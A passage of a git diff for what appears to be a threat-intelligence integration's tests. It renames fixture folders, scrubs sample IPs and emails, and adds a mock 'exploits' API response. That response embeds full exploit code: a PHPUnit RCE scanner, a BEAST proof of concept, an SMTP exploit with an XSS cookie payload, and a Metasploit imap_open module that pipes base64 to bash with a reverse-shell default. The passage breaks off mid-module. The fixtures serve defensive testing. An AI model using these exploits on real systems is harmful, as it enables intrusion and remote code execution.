"TestData/cti/botnet-compromised-credentials.json", + "test_data/cti/botnet-compromised-credentials.json", ) requests_mock.post("/auth/token/verify/") requests_mock.post("/auth/token/", json={"access": "token"}) @@ -1055,8 +1061,8 @@ def test_malicious_ip_command(requests_mock, mocker): And with the correct output prefix """ ip = "127.0.0.1" - botnet_response = load_json("TestData/cti/botnet.json") - phishing_response = load_json("TestData/cti/phishing.json") + botnet_response = load_json("test_data/cti/botnet.json") + phishing_response = load_json("test_data/cti/phishing.json") requests_mock.post("/auth/token/verify/") requests_mock.post("/auth/token/", json={"access": "token"}) requests_mock.get("/cti/botnet/", json=botnet_response) @@ -1094,7 +1100,7 @@ def test_malicious_hash_command(requests_mock, mocker): """ hash = "e89b43d57a67a3f4d705028cfbd7b6fb" hash_types = ["md5", "sha1", "sha256", "sha512"] - malware_response = load_json("TestData/cti/malware.json") + malware_response = load_json("test_data/cti/malware.json") requests_mock.post("/auth/token/verify/") requests_mock.post("/auth/token/", json={"access": "token"}) requests_mock.get("/cti/malware/", json=malware_response) @@ -1130,7 +1136,7 @@ def test_search_exploits_command(requests_mock, mocker): And with the correct output prefix """ since = "2023-06-27T00:00:00Z" - exploits_response = load_json("TestData/cti/exploits.json") + exploits_response = load_json("test_data/cti/exploits.json") requests_mock.post("/auth/token/verify/") requests_mock.post("/auth/token/", json={"access": "token"}) requests_mock.get("/cti/exploits/", json=exploits_response) diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/change_tags.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/change_tags.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/change_tags.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/change_tags.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/closed_alert.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/closed_alert.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/closed_alert.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/closed_alert.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/list_10_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/list_10_records.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/list_10_records.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/list_10_records.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/list_no_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/list_no_records.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/list_no_records.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/list_no_records.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/opened_alert.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/opened_alert.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/opened_alert.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/opened_alert.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/submit_threat.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/submit_threat.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/submit_threat.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/submit_threat.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/botnet-compromised-credentials.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/botnet-compromised-credentials.json similarity index 90% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/botnet-compromised-credentials.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/botnet-compromised-credentials.json index 1c18a38941b5..1945f4968c0b 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/botnet-compromised-credentials.json +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/botnet-compromised-credentials.json @@ -3,7 +3,7 @@ "results": [ { "domain": "stark.com", - "email": "natasha@stark.com", + "email": "email-address", "username": "natasha", "password": "7bb288255cb89d277fed03f3e2c6e724", "breach_name": "Raid Forums/XSS/Exploit: Stark Data Breach (7,409,054 Records)", diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/botnet.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/botnet.json similarity index 95% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/botnet.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/botnet.json index 83a9928f91f7..be922d154363 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/botnet.json +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/botnet.json @@ -2,7 +2,7 @@ "next": null, "results": [ { - "ip_address": "99.83.33.209", + "ip_address": "ip_address", "listed_at": "2023-02-09T23:44:09Z", "bot_name": "andromeda", "c2_ip_address": "184.105.192.2", @@ -28,7 +28,7 @@ ] }, { - "ip_address": "99.83.33.209", + "ip_address": "ip_address", "listed_at": "2023-02-09T23:44:09Z", "bot_name": "andromeda", "c2_ip_address": "184.105.192.2", @@ -54,7 +54,7 @@ ] }, { - "ip_address": "99.83.33.209", + "ip_address": "ip_address", "listed_at": "2023-02-09T23:44:09Z", "bot_name": "andromeda", "c2_ip_address": "184.105.192.2", @@ -80,7 +80,7 @@ ] }, { - "ip_address": "99.83.33.209", + "ip_address": "ip_address", "listed_at": "2023-02-27T11:12:35.375167Z", "bot_name": "andromeda", "c2_ip_address": "184.105.192.2", diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/c2-domains.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/c2-domains.json similarity index 94% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/c2-domains.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/c2-domains.json index c304a382ecde..29c0518f6f0b 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/c2-domains.json +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/c2-domains.json @@ -15,7 +15,7 @@ "family:mal/generic-s" ], "ip_addresses": [ - "64.190.63.111" + "some_ip_address" ], "updated_at": "2023-06-14T10:56:24Z", "created_at": "2023-06-14T11:10:48.373715Z" @@ -34,7 +34,7 @@ "family:mal/generic-s" ], "ip_addresses": [ - "64.190.63.111" + "some_ip_address" ], "updated_at": "2023-06-14T23:15:05Z", "created_at": "2023-06-27T13:03:40.949689Z" diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/compromised-credentials.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/compromised-credentials.json similarity index 80% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/compromised-credentials.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/compromised-credentials.json index 741726cc57f6..8a3f7efd3b17 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/compromised-credentials.json +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/compromised-credentials.json @@ -3,8 +3,8 @@ "results": [ { "domain": "stark.industries", - "email": "tony@stark.industries", - "username": "tony@stark.industries", + "email": "some_email_address", + "username": "some_email_address", "password": null, "breach_name": "BreachForums/Amunet: American Academy of Psychiatry and the Law Data Breach (3,001 Records)", "breach_id": "123", diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/email-addresses.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/email-addresses.json similarity index 89% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/email-addresses.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/email-addresses.json index 25890a725132..7138fa1b9edc 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/email-addresses.json +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/email-addresses.json @@ -3,7 +3,7 @@ "results": [ { "created_at": "2023-06-27T12:31:05Z", - "email": "james@stark.com", + "email": "some_email_address", "domain": "stark.com", "tags": [ "family:agenttesla", diff --git a/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/exploits.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/exploits.json new file mode 100644 index 000000000000..5b349a7fac8b --- /dev/null +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/exploits.json @@ -0,0 +1,87 @@ +{ + "next": "https://api.zerofox.com/cti/exploits/?cursor=c2E9MTYyNzU2ODM2ODAwMCZzYT0zMQ%3D%3D&since=2023-06-27T00%3A00%3A00Z", + "results": [ + { + "created_at": "2021-07-26T09:40:37Z", + "cve": "CVE-2017-9841", + "urls": [ + "https://github.com/ludy-dev/PHPUnit_eval-stdin_RCE/blob/master/PHPUnit_eval-stdin_RCE.py" + ], + "exploit": "import re\nimport requests\nimport sys\nimport os\nimport base64\n\ndef exploit(dst_addr):\n\tlist = {\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/vendor/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/vendor/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/Util/PHP/eval-stdin.php\"}\n\t\n\tprint(dst_addr)\n\tfor i in list:\n\t\t\n\t\tURL=\"http://\"+dst_addr+i\n\t\tprint(URL)\n\t\tdata = \"\"\n\t\tres = requests.post(URL, data=data, verify=False)\n\t\tresponse = res.text\n\t\t\n \t\tp = re.compile('c0eb89e1d7f2982390f96603e66f2b6b') # md5(Apri1) = c0eb89e1d7f2982390f96603e66f2b6b\n\t\tm = p.match(response)\n\t\tprint(\"Status Code : %d\"% res.status_code)\n\t\tif m:\n\t\t\t\tprint(\"Vuln Found\")\n\t\telse:\n\t\t\t\tprint(\"Not Found\")\n\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) == 2:\n\t\t sys.argv.append('80')\n\telif len(sys.argv) < 3:\n\t\t\tprint ('Usage: python %s ' % os.path.basename(sys.argv[0]))\n\t\t\tsys.exit()\t\n\taddress =(sys.argv[1], sys.argv[2])\n\tdst_addr=\":\".join(address)\n\texploit(dst_addr)" + }, + { + "created_at": "2021-07-26T10:50:22Z", + "cve": "CVE-2011-3389", + "urls": [ + "https://github.com/mpgn/BEAST-PoC" + ], + "exploit": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\n BEAST attack - PoC\n Implementation of the cryptographic path behind the attack\n Author: mpgn \n'''\n\nimport random\nimport binascii\nimport sys\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\n\"\"\"\n AES-CBC\n function encrypt, decrypt, pad, unpad\n You can fix the IV in the function encrypt() because TLS 1.0 fix the IV\n for the second, third... request (to gain time)\n\"\"\"\n\ndef pad(s):\n return s + (16 - len(s) % 16) * chr(16 - len(s) % 16)\n\ndef unpad(s):\n return s[:-ord(s[len(s)-1:])]\n\n# we admit the handshake produce a secret key for the session\n# of course we do not have any HMAC etc .. but there are not usefull in this attack\ndef encrypt( msg, iv_p=0):\n raw = pad(msg)\n if iv_p == 0:\n iv = Random.new().read( AES.block_size )\n else:\n iv = iv_p\n global key\n key = Random.new().read( AES.block_size )\n cipher = AES.new('V38lKILOJmtpQMHp', AES.MODE_CBC, iv )\n return cipher.encrypt( raw )\n\n\"\"\"\n The PoC of BEAST attack -\n Implementation of the cryptographic path behind the attack\n - the attacker can retrieve the request send be the client \n - but also make the client send requests with the plain text of his choice\n\"\"\"\n\ndef xor_strings(xs, ys, zs):\n return \"\".join(chr(ord(x) ^ ord(y) ^ ord(z)) for x, y, z in zip(xs, ys, zs))\n\ndef xor_block(vector_init, previous_cipher,p_guess):\n xored = xor_strings(vector_init, previous_cipher, p_guess)\n return xored\n\ndef split_len(seq, length):\n return [seq[i:i+length] for i in range(0, len(seq), length)]\n\n# the PoC start here, two method, one with two request\n# the other with two request\ndef run_two_request(find_me):\n print \"Start decrypting the request block 0 --> block 0\\n\"\n \n secret = []\n\n # the part of the request the atacker know, can be null\n i_know = \"flag: \"\n\n # padding is the length we need to add to i_know to create a length of 15 bytes\n padding = 16 - len(i_know) - 1\n i_know = \"a\"*padding + i_know\n\n # add_byte will be decrement every byte deciphered\n add_byte = 16\n length_block = 16\n t = 0\n\n # retrieve all the request\n while(t < (len(find_me)-len(\"flag: \"))):\n for i in range(0,256):\n \n # good pad\n if (add_byte+padding) < 0:\n s = find_me[-1*(add_byte+padding):]\n else:\n s = find_me\n\n # the client send the encrypted request with socket and TLS1.0\n # you intercept the request and now you have: enc\n enc = encrypt(\"a\"*(add_byte+padding) + s)\n\n # get the value of the request ciphered\n original = split_len(binascii.hexlify(enc), 32)\n\n # GUESS XOR VI XOR C_I_1 build by the attacker\n vector_init = str(enc[-length_block:])\n previous_cipher = str(enc[0:length_block])\n p_guess = i_know + chr(i)\n \n xored = xor_block( vector_init, previous_cipher, p_guess)\n\n # with some javascript injection, you force the client to send\n # request of your choice, the TLS1.0 fix the IV to the last block of the previous request\n # with a MiTM you intercept the result and get\n enc = encrypt(xored, vector_init)\n\n result = split_len(binascii.hexlify(enc), 32)\n\n sys.stdout.write(\"\\r%s -> %s \" % (original[1], result[0]))\n sys.stdout.flush()\n\n # if the result request contains the same cipher block from the original request -> OK\n if result[0] == original[1]:\n print \" Find char \" + chr(i)\n i_know = p_guess[1:]\n add_byte = add_byte - 1\n secret.append(chr(i))\n t = t + 1\n break\n elif i == 255:\n print \"Unable to find the char...\"\n return secret\n return secret\n\n# the PoC start here \ndef run_three_request(find_me):\n print \"Start decrypting the request using block 0 --> block 1\\n\"\n\n secret = []\n\n # the part of the request the atacker know, can be null\n i_know = \"flag: \"\n\n # padding is the length we need to add to i_know to create a length of 15 bytes\n padding = 16 - len(i_know) - 1\n i_know = \"a\"*padding + i_know\n length_block = 16\n t = 0\n\n # retrieve all the request\n while(t < (len(find_me)-len(\"flag: \"))):\n for i in range(0,256):\n # good pad\n if padding < 0:\n s = find_me[-1*(padding):]\n else:\n s = find_me\n \n # the first request is send\n first_r = encrypt(\"a\"*(padding) + s)\n # the second request is send\n enc = encrypt(\"a\"*(padding) + s, first_r[-length_block:])\n\n # get the value of the request ciphered\n original = split_len(binascii.hexlify(enc), 32)\n\n # GUESS XOR VI XOR C_I_1 build by the attacker\n vector_init = str(enc[-length_block:])\n previous_cipher = str(first_r[-length_block:])\n p_guess = i_know + chr(i)\n\n xored = xor_block( vector_init, previous_cipher, p_guess)\n\n # with some javascript injection, you force the client to send the\n # request of your choice, the TLS1.0 fix the IV to the last block of the previous request\n # with a MiTM you intercept the result and get\n enc = encrypt(xored, vector_init)\n\n result = split_len(binascii.hexlify(enc), 32)\n\n sys.stdout.write(\"\\r%s -> %s \" % (original[0], result[0]))\n sys.stdout.flush()\n\n # if the result request contains the same cipher block from the original request -> OK\n if result[0] == original[0]:\n print \" Find char \" + chr(i)\n i_know = p_guess[1:]\n padding = padding -1\n secret.append(chr(i))\n t = t + 1\n break\n elif i == 255:\n print \"Unable to find the char...\"\n return secret\n return secret\n\n\n# the attacker don't know the flag\nsecret = run_three_request(\"flag: WIN{TLS_1.0_Not_SO_Good_With_Socket}\")\n# or\n# secret = run_two_request(\"flag: WIN{TLS_1.0_Not_SO_Good_With_Socket}\")\n\nfound = ''.join(secret)\nprint \"\\n\" + found" + }, + { + "created_at": "2021-07-26T12:19:18Z", + "cve": "CVE-2005-2857", + "urls": [ + "some_host/exploits/1193" + ], + "exploit": "#!usr/bin/perl\n#\n# FREE SMTP Spam Filter Exploit\n# ------------------------------------\n# Infam0us Gr0up - Securiti Research\n#\n# Info: infamous.2hell.com\n# Vendor URL: some_host/\n# \n\nuse IO::Socket;\nuse Socket;\n\nprint(\"\\n FREE SMTP Spam Filter Exploit\\n\");\nprint(\" ---------------------------------\\n\\n\");\n\n# Changes to own feed \n$helo = \"mail.test\"; # HELO\n$mfrom = \"[support@vuln.test]\"; # MAIL FROM\n$rcpto = \"[root@localhost]\"; # RCPT TO\n$date = \"11 Feb 2099 12:07:10\"; # Date\n$from = \"Micro SEX's\"; # From mailer\n$subject = \"Check the new version.. ®®®\\n\".\n\"[b]VICKY VETTE[/b][i]is HOT Editon.Check it OUT!!. Free Nude Shop. Sex,video,picture,toys and XXX Chat Adults live!!![/i]\".\n\"[br][a href=http://127.0.0.1 onMouseOver=alert(document.cookie);]Click Here[/a]\"; # subject spammmer\n\nif($#ARGV < 0 | $#ARGV > 1) { \ndie \"usage: perl $0 [IP/host] \\nExam: perl $0 127.0.0.1 \\n\" };\n\n$adr = $ARGV[0];\n$prt = \"25\";\n\n# Don't changes this one\n$act1 = \"\\x48\\x45\\x4c\\x4f $helo\";\n$act2 = \"\\x4d\\x41\\x49\\x4c \\x46\\x52\\x4f\\x4d\\x3a$mfrom\";\n$act3 = \"\\x52\\x43\\x50\\x54 f\\x54\\x4f\\x3a$rcpto\";\n$act4 = \"\\x44\\x41\\x54\\x41\";\n$act5 = \"\\x44\\x61\\x74\\x65\\x3a $date\";\n\n$sub = \n\"\\x46\\x72\\x6f\\x6d\\x3a $from\".\n\"\\x53\\x75\\x62\\x6a\\x65\\x63\\x74\\x3a $subject\\x2e\".\n\"\\x51\\x55\\x49\\x54\";\n\nprint \"[+] Connect to $adr..\\n\";\n$remote = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>$adr,\nPeerPort=>$prt, Reuse=>1) or die \"[-] Error: can't connect to $adr:$prt\\n\";\nprint \"[+] Connected!\\n\";\n$remote->autoflush(1);\nprint \"[*] Send HELO..\";\nprint $remote \"$act1\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send MAIL FROM..\";\nprint $remote \"$act2\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send RCPT TO..\";\nprint $remote \"$act3\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send DATA..\";\nprint $remote \"$act4\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send DATE..\";\nprint $remote \"$act5\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send Sub Mail..\";\nprint $remote \"$sub\" or die \"\\n[-] Error: can't send xploit code\\n\";\nprint \"[OK]\\n\";\nprint \"[*] QUIT..\\n\";\nprint \"[+] MAIL SPAMWNED!\\n\\n\";\nclose $remote;\nprint \"press any key to exit..\\n\";\n$bla= [STDIN];\n\n# milw0rm.com [2005-09-02]" + }, + { + "created_at": "2021-07-26T12:35:48Z", + "cve": "CVE-2018-19518", + "urls": [ + "https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/modules/exploits/linux/http/php_imap_open_rce.rb" + ], + "exploit": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'php imap_open Remote Code Execution',\n 'Description' => %q{\n The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an\n IMAP session. On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. Ssh's ProxyCommand\n option can be passed from imap_open to execute arbitrary commands.\n While many custom applications may use imap_open, this exploit works against the following applications:\n e107 v2, prestashop, SuiteCRM, as well as Custom, which simply prints the exploit strings for use.\n Prestashop exploitation requires the admin URI, and administrator credentials.\n suiteCRM/e107 require administrator credentials. Fixed in php 5.6.39.\n },\n 'Author' =>\n [\n 'Anton Lopanitsyn', # Vulnerability discovery and PoC\n 'Twoster', # Vulnerability discovery and PoC\n 'h00die', # Metasploit Module\n 'Paolo Serracino', # Horde IMP EDB\n 'Pietro Minniti', # Horde IMP EDB\n 'Damiano Proietti' # Horde IMP EDB\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395' ],\n [ 'URL', 'https://github.com/Bo0oM/PHP_imap_open_exploit' ],\n [ 'EDB', '45865'],\n # This claims all versions of Horde IMP are vuln, but only H3 (~2012) and possibly older are vuln.\n [ 'EDB', '46136'],\n [ 'URL', 'some_host/bug.php?id=76428'],\n [ 'CVE', '2018-19518'],\n [ 'CVE', '2018-1000859']\n ],\n 'Privileged' => false,\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n [ 'prestashop', {} ],\n [ 'suitecrm', {}],\n [ 'e107v2', {'WfsDelay' => 90}], # may need to wait for cron\n [ 'Horde IMP H3', {}],\n [ 'custom', {'WfsDelay' => 300}]\n ],\n 'PrependFork' => true,\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'cmd/unix/reverse_netcat',\n 'WfsDelay' => 120\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2018-10-23'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base directory path\", '/admin2769gx8k3']),\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '']),\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", ''])\n ])\n end\n\n def check\n if target.name =~ /prestashop/\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({'uri' => uri})\n if res && (res.code == 301 || res.code == 302)\n return CheckCode: :Detected\n end\n elsif target.name =~ /suitecrm/\n #login page GET /index.php?action=Login&module=Users\n vprint_status('Loading login page')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 'action' => 'Login',\n 'module' => 'Users'\n }\n )\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if res.code = 200\n return CheckCode: :Detected\n end\n elsif target.name =~ /Horde IMP H3/\n res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'imp', 'test.php')})\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n major, minor = res.body.scan(/PHP Major Version: (?5\\.[1-6]{1})<\/li>\\s+
  • PHP Minor Version: (?[\\d]?\\d)/).flatten\n phpversion = \"#{major}.#{minor}\"\n if res.code == 200 && res.body =~ /PHP Mail Server Support Test/ && phpversion != '.'\n if Rex::Version.new(phpversion) < Rex::Version.new('5.6.39')\n vprint_good(\"PHP Version #{phpversion} is vulnerable\")\n return CheckCode: :Appears\n else\n vprint_bad(\"PHP Version #{phpversion} is NOT vulnerable, patched in 5.6.39.\")\n end\n end\n end\n CheckCode::Safe\n end\n\n def command(spaces='$IFS$()')\n #payload is base64 encoded, and stuffed into the SSH option.\n enc_payload = Rex::Text.encode_base64(payload.encoded)\n command = \"-oProxyCommand=`echo #{enc_payload}|base64 -d|bash`\"\n #final payload can not contain spaces, however $IFS$() will return the space we require\n command.gsub!(' ', spaces)\n end\n\n def exploit\n if target.name =~ /prestashop/\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({'uri' => uri})\n if res && res.code != 301\n print_error('Admin redirect not found, check URI. Should be something similar to /admin2769gx8k3')\n return\n end\n\n #There are a bunch of redirects that happen, so we automate going through them to get to the login page.\n while res.code == 301 || res.code == 302\n cookie = res.get_cookies\n uri = res.headers['Location']\n vprint_status(\"Redirected to #{uri}\")\n res = send_request_cgi({'uri' => uri})\n end\n\n #Tokens are generated for each URL or sub-component, we need valid ones!\n /.*token=(?\\w{32})/ =~ uri\n /id=\"redirect\" value=\"(?.*)\"\/>/ =~ res.body\n cookie = res.get_cookies\n\n unless token && redirect\n print_error('Unable to find token and redirect URL, check options.')\n return\n end\n\n vprint_status(\"Token: #{token} and Login Redirect: #{redirect}\")\n print_status(\"Logging in with #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_post' => {\n 'ajax' => 1,\n 'token' => '',\n 'controller' => 'AdminLogin',\n 'submitLogin' => '1',\n 'passwd' => datastore['PASSWORD'],\n 'email' => datastore['USERNAME'],\n 'redirect' => redirect\n },\n 'vars_get' => {\n 'rand' => '1542582364810' #not sure if this will hold true forever, I didn't see where it is being generated\n }\n )\n if res && res.body.include?('Invalid password')\n print_error('Invalid Login')\n return\n end\n vprint_status(\"Login JSON Response: #{res.body}\")\n uri = JSON.parse(res.body)['redirect']\n cookie = res.get_cookies\n print_good('Login Success, loading admin dashboard to pull tokens')\n res = send_request_cgi({'uri' => uri, 'cookie' => cookie})\n\n /AdminCustomerThreads&token=(?\\w{32})/ =~ res.body\n vprint_status(\"Customer Threads Token: #{token}\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_get' => {\n 'controller' => 'AdminCustomerThreads',\n 'token' => token\n }\n })\n\n /form method=\"post\" action=\"index\\.php\\?controller=AdminCustomerThreads&token=(?\\w{32})/ =~ res.body\n print_good(\"Sending Payload with Final Token: #{token}\")\n data = Rex::MIME::Message.new\n data.add_part('1', nil, nil, 'form-data; name=\"PS_CUSTOMER_SERVICE_FILE_UPLOAD\"')\n data.add_part(\"Dear Customer,\\n\\nRegards,\\nCustomer service\", nil, nil, 'form-data; name=\"PS_CUSTOMER_SERVICE_SIGNATURE_1\"')\n data.add_part(\"x #{command}}\", nil, nil, 'form-data; name=\"PS_SAV_IMAP_URL\"')\n data.add_part('143', nil, nil, 'form-data; name=\"PS_SAV_IMAP_PORT\"')\n data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name=\"PS_SAV_IMAP_USER\"')\n data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name=\"PS_SAV_IMAP_PWD\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_DELETE_MSG\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_CREATE_THREADS\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_POP3\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_NORSH\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_SSL\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_VALIDATE-CERT\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_NOVALIDATE-CERT\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_TLS\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_NOTLS\"')\n data.add_part('', nil, nil, 'form-data; name=\"submitOptionscustomer_thread\"')\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s,\n 'cookie' => cookie,\n 'vars_get' => {\n 'controller' => 'AdminCustomerThreads',\n 'token' => token\n }\n )\n print_status('IMAP server change left on server, manual revert required.')\n\n if res && res.body.include?('imap Is Not Installed On This Server')\n print_error('PHP IMAP mod not installed/enabled ')\n end\n elsif target.name =~ /suitecrm/\n #login page GET /index.php?action=Login&module=Users\n vprint_status('Loading login page')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 'action' => 'Login',\n 'module' => 'Users'\n }\n )\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if res.code = 200\n cookie = res.get_cookies\n else\n print_error(\"HTTP code #{res.code} found, check options.\")\n return\n end\n\n vprint_status(\"Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_post' => {\n 'module' => 'Users',\n 'action' => 'Authenticate',\n 'return_module' => 'Users',\n 'return_action' => 'Login',\n 'cant_login' => '',\n 'login_module' => '',\n 'login_action' => '',\n 'login_record' => '',\n 'login_token' => '',\n 'login_oauth_token' => '',\n 'login_mobile' => '',\n 'user_name' => datastore['USERNAME'],\n 'username_password' => datastore['PASSWORD'],\n 'Login' => 'Log+In'\n }\n )\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if res.code = 302\n cookie = res.get_cookies\n print_good('Login Success')\n else\n print_error('Failed Login, check options.')\n end\n\n #load the email settings page to get the group_id\n vprint_status('Loading InboundEmail page')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_get' => {\n 'module' => 'InboundEmail',\n 'action' => 'EditView'\n }\n )\n\n unless res\n print_error('Error loading site.')\n return\n end\n\n /\"group_id\" value=\"(?\\w{8}-\\w{4}-\\w{4}-\\w{4}-\\w{12})\">/ =~ res.body\n\n unless group_id\n print_error('Could not identify group_id 